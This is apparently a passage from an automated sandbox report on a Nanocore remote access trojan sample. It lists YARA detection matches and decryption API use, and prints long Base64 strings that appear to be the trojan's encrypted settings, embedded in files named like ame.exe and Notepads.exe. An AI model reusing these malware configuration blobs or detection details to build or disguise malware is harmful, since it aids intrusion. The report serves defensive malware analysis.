            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: dhcpmon.exe.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.999787946429
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: ame.exe.1.dr, Client/Settings.csBase64 encoded string: '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
            Source: Notepads.exe.3.dr, Client/Settings.csBase64 encoded string: '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
            Source: 3.2.ame.exe.500000.0.unpack, Client/Settings.csBase64 encoded string: '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', 